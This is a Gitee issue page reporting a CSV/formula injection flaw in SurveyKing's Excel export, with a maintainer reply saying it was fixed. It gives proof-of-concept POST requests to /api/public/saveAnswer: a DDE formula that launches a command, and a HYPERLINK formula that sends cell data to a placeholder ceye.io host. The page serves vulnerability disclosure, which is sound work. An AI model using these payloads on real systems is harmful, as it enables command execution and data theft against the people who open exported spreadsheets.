310 Star 3.1K Fork 955

SurveyKing / SurveyKing

 / 详情

CSV injection when filling out the form

已完成
创建于  
2022-02-23 20:20

The data is not filtered properly when exporting excel, which will lead to CSV injection. May cause information disclosure or rce.

Vulnerability url:
/api/public/saveAnswer
/api/answers/download

POC:

rce:
POST /api/public/saveAnswer HTTP/1.1
...
{"answer":{"xxx":{"xxx":"=cmd|'/c calc'!A0"}},"projectId":"xxx","metaInfo":{"answerInfo":{"startTime":1645615171668,"endTime":1645615194031}}}

or

Information disclosure:
POST /api/public/saveAnswer HTTP/1.1
...
{"answer":{"xxx":{"xxx":"=HYPERLINK("http://xxx.ceye.io?test=\"&A2&A3,\"Error: Please click me!")"}},"projectId":"xxx","metaInfo":{"answerInfo":{"startTime":1645615171668,"endTime":1645615194031}}}

steps:

1.Submit questionnaire
输入图片说明
or
输入图片说明
or others

2.export excel
输入图片说明

3.been hacked,looks like:

information disclosure:
输入图片说明
输入图片说明

rce:
输入图片说明

评论 (1)

StrangeJ 创建了任务
StrangeJ 修改了描述
StrangeJ 修改了描述
StrangeJ 修改了描述
StrangeJ 修改了描述
StrangeJ 修改了描述
javahuang 任务状态从 待办的 修改为进行中
StrangeJ 修改了描述
javahuang 任务状态从 进行中 修改为已完成
javahuang 任务状态从 已完成 修改为进行中
展开全部操作日志

Thanks so much, I've tried to fix this @StrangeJ

javahuang 任务状态从 进行中 修改为已完成
javahuang 任务状态从 已完成 修改为进行中
javahuang 任务状态从 进行中 修改为已完成

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(2)
86496 javahrp 1675644121
Java
1
https://gitee.com/surveyking/surveyking.git
git@gitee.com:surveyking/surveyking.git
surveyking
surveyking
SurveyKing

搜索帮助